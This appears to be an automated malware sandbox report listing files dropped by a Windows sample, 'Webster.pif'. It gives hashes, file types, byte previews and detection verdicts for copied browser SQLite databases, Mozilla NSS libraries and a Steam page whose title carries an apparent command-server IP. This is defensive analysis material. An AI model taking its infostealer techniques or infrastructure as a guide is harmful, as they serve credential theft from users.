                                                                                SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\ProgramData\GDHDAEBGCAAF\ECGDHD

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                Category:dropped
                                                                                Size (bytes):196608
                                                                                Entropy (8bit):1.1239949490932863
                                                                                Encrypted:false
                                                                                SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                MD5:271D5F995996735B01672CF227C81C17
                                                                                SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\ProgramData\GDHDAEBGCAAF\FHCGHJ

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.8508558324143882
                                                                                Encrypted:false
                                                                                SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                MD5:933D6D14518371B212F36C3835794D75
                                                                                SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\ProgramData\GDHDAEBGCAAF\GDHDAE

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):155648
                                                                                Entropy (8bit):0.5407252242845243
                                                                                Encrypted:false
                                                                                SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\ProgramData\GDHDAEBGCAAF\HDAFII

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\ProgramData\GDHDAEBGCAAF\JJKFBA

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):98304
                                                                                Entropy (8bit):0.08235737944063153
                                                                                Encrypted:false
                                                                                SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\ProgramData\GDHDAEBGCAAF\JJKFBA-shm

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):32768
                                                                                Entropy (8bit):0.017262956703125623
                                                                                Encrypted:false
                                                                                SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                Malicious:false
                                                                                Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\ProgramData\GDHDAEBGCAAF\KFIJJE

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):5242880
                                                                                Entropy (8bit):0.0357803477377646
                                                                                Encrypted:false
                                                                                SSDEEP:192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
                                                                                MD5:76D181A334D47872CD2E37135CC83F95
                                                                                SHA1:B563370B023073CE6E0F63671AA4AF169ABBF4E1
                                                                                SHA-256:52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
                                                                                SHA-512:23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\ProgramData\GDHDAEBGCAAF\KFIJJE-shm

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):32768
                                                                                Entropy (8bit):0.017262956703125623
                                                                                Encrypted:false
                                                                                SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                Malicious:false
                                                                                Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\ProgramData\freebl3.dll

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):685392
                                                                                Entropy (8bit):6.872871740790978
                                                                                Encrypted:false
                                                                                SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                Malicious:false
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Joe Sandbox View:
                                                                                • Filename: 6SoKuOqyNh.exe, Detection: malicious, Browse
                                                                                • Filename: IRqsWvBBMc.exe, Detection: malicious, Browse
                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                • Filename: JGKjBsQrMc.exe, Detection: malicious, Browse
                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                • Filename: Bootstrapper.exe, Detection: malicious, Browse
                                                                                • Filename: azeyNF3kkf.exe, Detection: malicious, Browse
                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\ProgramData\mozglue.dll

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):608080
                                                                                Entropy (8bit):6.833616094889818
                                                                                Encrypted:false
                                                                                SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                Malicious:false
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Joe Sandbox View:
                                                                                • Filename: 6SoKuOqyNh.exe, Detection: malicious, Browse
                                                                                • Filename: IRqsWvBBMc.exe, Detection: malicious, Browse
                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                • Filename: JGKjBsQrMc.exe, Detection: malicious, Browse
                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                • Filename: Bootstrapper.exe, Detection: malicious, Browse
                                                                                • Filename: azeyNF3kkf.exe, Detection: malicious, Browse
                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\ProgramData\msvcp140.dll

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):450024
                                                                                Entropy (8bit):6.673992339875127
                                                                                Encrypted:false
                                                                                SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                Malicious:false
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                C:\ProgramData\nss3.dll

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):2046288
                                                                                Entropy (8bit):6.787733948558952
                                                                                Encrypted:false
                                                                                SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                Malicious:false
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\ProgramData\softokn3.dll

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):257872
                                                                                Entropy (8bit):6.727482641240852
                                                                                Encrypted:false
                                                                                SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                Malicious:false
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\ProgramData\vcruntime140.dll

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):80880
                                                                                Entropy (8bit):6.920480786566406
                                                                                Encrypted:false
                                                                                SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                MD5:A37EE36B536409056A86F50E67777DD7
                                                                                SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                Malicious:false
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\76561199747278259[1].htm

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):34725
                                                                                Entropy (8bit):5.399394913451706
                                                                                Encrypted:false
                                                                                SSDEEP:768:/dpqm+0Ih3tAA9CWGVGfcDAJTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x2l:/d8m+0Ih3tAA9CWGVGFJTBv++nIjBtPR
                                                                                MD5:571F95A39B55CF9D655DEE97DC80969F
                                                                                SHA1:7C7CB1CFF7833D115AD5B39E06F0C8FC0FC7DE4F
                                                                                SHA-256:DD8E244AE7D6A0022632F46E73B1D7DAF5D0085C9F2FE9F9B82065B43A2AA3DD
                                                                                SHA-512:CD6B69DE7D337A5DE058A0A82173C371F0E97D070B846C01D926A440321553AFFDF9A2B0F6EA0C8AD5E83D6A7F6873663BEAF2B1BA34FDCB4C8034FB74372345
                                                                                Malicious:false
                                                                                Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: gi_z2 https://5.75.212.60|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english" rel="stylesheet" type="text/css" >.<link href

                                                                                C:\Users\user\AppData\Local\Temp\229536\U

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):325387
                                                                                Entropy (8bit):7.999451578130654
                                                                                Encrypted:true
                                                                                SSDEEP:6144:neDEtFuEeCdh8PFQ4StqSfIUje6PxWchOhLRV8XZ7ijonPbe:neYP5hStQ4S5e6Px7hOpR47i8nPbe
                                                                                MD5:7D2FBC6E9057ACB9B63F9A2DC5E558ED
                                                                                SHA1:4C726081E0B06B5B90C3D4F1BDA8F961F0462527
                                                                                SHA-256:135D70495EE908B023E4118B7C3B3D414517ABF9F9EE0784E8AF970DC3CF371D
                                                                                SHA-512:3A40431599908B2B375D56854D2CE816F95A2CE5F02D9EAF6401C31598A4A3ECE93742215A85A6EF6EAB30922C8FB2AB0AD6BBFACC79FA56A70FAAA2B54BC849
                                                                                Malicious:false
                                                                                Preview:..&s cW.,.TK%.......,s..G".$....`USD.......g....7.!.k"..r.4...ae&.U[.......g.jcc..;.%.2.Z..y....1i>.w.qM.b.=..f.&...#.(ef..1..e.8.%.O.R.5.b...../.`.zF...B.W..4..x.k...N(.R...p....M....~U<O.......}*..........E.fp0...#.*RD...4\;..V..X.W.....}..6.....iM.....i.'....O...c3.Z...F..Q/.. ..oR..N....O...?.z....wxx...Zh..r9La.'..U....`..W..x.........%a..A.!h.l.#..Y.MR9o.).^..?..6....O...58.......3.Rg...g.dhUi...U.d..o..9.,.v.!.!^..z....cz]C.bp...M.x3.....x0QG.Hw......"V./\m..j.[u@..`....n3(.{..y.?..{j"?.jrd........'.....#....B.`F..*.!6Hc..`.2C..X.g[I.n..s|....3/....u.hD]R.....=_s..6Vs......-s.K0G.lv..^.d~..n.r.+..m...6._~$.......C..D.E..!lUlnG..2..?.S..?r.........(...!.!....G...2N.`......A.w.`7..-...(2....{....1....v5..'yP.%.d.^^rw..8..0F&..Z....g.%......c[.Hj...3.dO:+E..OG.z.j_...9{........)$.L.'E.-g...{..g.. ...O......p(.&#L.)B..|eYs.W..L..!h5.>.g...o..U.C8t...D....h..9........=...l..m4.e#...7...l..]H..zG^.u}o...DfV.&YX.e.B=M...Fh..5Nj.;..a

                                                                                C:\Users\user\AppData\Local\Temp\229536\Webster.pif

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Category:modified
                                                                                Size (bytes):893608
                                                                                Entropy (8bit):6.620254876639106
                                                                                Encrypted:false
                                                                                SSDEEP:12288:DpVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31troPTdFqgaAV2M0L:DT3E53Myyzl0hMf1te7xaA8M0L
                                                                                MD5:6EE7DDEBFF0A2B78C7AC30F6E00D1D11
                                                                                SHA1:F2F57024C7CC3F9FF5F999EE20C4F5C38BFC20A2
                                                                                SHA-256:865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4
                                                                                SHA-512:57D56DE2BB882F491E633972003D7C6562EF2758C3731B913FF4D15379ADA575062F4DE2A48CA6D6D9241852A5B8A007F52792753FD8D8FEE85B9A218714EFD0
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 7%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L......Z.........."...............................@.................................Jo....@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\Agriculture

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):22528
                                                                                Entropy (8bit):6.7617815427378885
                                                                                Encrypted:false
                                                                                SSDEEP:384:bjLC3x1tMfPM8U6awhLVrg/drYEAmgPph1nNE3TOZfWGTiRr+if:bjLixwghYEYP3iSRWG7if
                                                                                MD5:7BC00EA684D7F31EF289632AB18DC07D
                                                                                SHA1:C3951442E5E7D7F8170C38E0BD3B4734E5F88E78
                                                                                SHA-256:64AA151E343829CC4B1D337C410AB786228CD64F37456D0929E6F05768BA9CF6
                                                                                SHA-512:A8245F3E3FE8781510650C643A0B5E8BCD405632D47A2D43586763A3B7A8D8126FE6970A94B5957B022AABA943C43F4E8D80AF7696F2B4E621B107D5212CA2EF
                                                                                Malicious:false
                                                                                Preview:.u......YP....I.].U..V.u.3...t^.M.SW.}.jA[jZZ+..U...jZZ....f;.r.f;.w... ..........f;.r.f;E.w... ......Nt.f..t.f;.t......._+.[^]...Q.L$.+.........Y....Q.L$.+.........Y.t...U..E....8csm.u%.x..u..@.= ...t.=!...t.="...t.=.@..t.3.].....Y...h.LC...V..Y3..U..QQSVWh......[L.3.S3.f..]L.W....I..5(bL....QL...t.f9>u...E.P.E.PWWV.c....].........?sK.E.=....sA..X....;.r6Q.<....Y..t).E.P.E.P...PWV. ....E....H.=.QL...QL.3......_^[..].U..QQ.E..M..U.S.].V.u.W3..;........t.......u..E. ....E.....j"Xf9.u.3...j"........X......t.f..f...........f..t...u.f;E.t.f;E.u...t.3.f.B.......}.3.].f9..........f;E.t.f;E.u......f9.........t.......u..E..u...j\.E.....X.....Cf9.t.j"Xf9.j\Xu;...u%..t.j"_f9y..}.u.......e..3........j\X....K..t.f.........u....f..t,..u.f;E.t"f;E.t..}..t...t.f..........3..m....u..u...t.3.f.......3........t....E._^[....].SV.5.QL.3.W....u........f;.t.GV.....Y.4F......j=Yf..u.G.j.P.;:.....=.QL.YY..t..5.QL.f9.tDV.C...Yj=.X.Xf9.t"j.S..:....YY..tAVSP.*........uI....4^3.f9.u.5.QL.V.X......QL.3..

                                                                                C:\Users\user\AppData\Local\Temp\Argued

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):53248
                                                                                Entropy (8bit):6.576988257355422
                                                                                Encrypted:false
                                                                                SSDEEP:1536:eVJRa5oQyyk4qt1FqnLUshVkf88nfNk4qqdGYynTDYd:eV7a5ouYNqnLzAfaBaGdD0
                                                                                MD5:C93F6EB6D3DE06BE653476BFEF360043
                                                                                SHA1:BA92B5E1EC74FD72E04824742F3118797AEA0512
                                                                                SHA-256:4BF7F1BCD2744F0E38E31C78586DF5B020BD14C72C15E287523EB9864A0E1B29
                                                                                SHA-512:D7297A7AD2CBD1DA408C626982D7290F08BC93B74D5FDFB718D8224099B00FFBA8977A2B18AC8E297D8109ACA917FAA72D93BB666C4F1FD79C9DE4A312B6C679
                                                                                Malicious:false
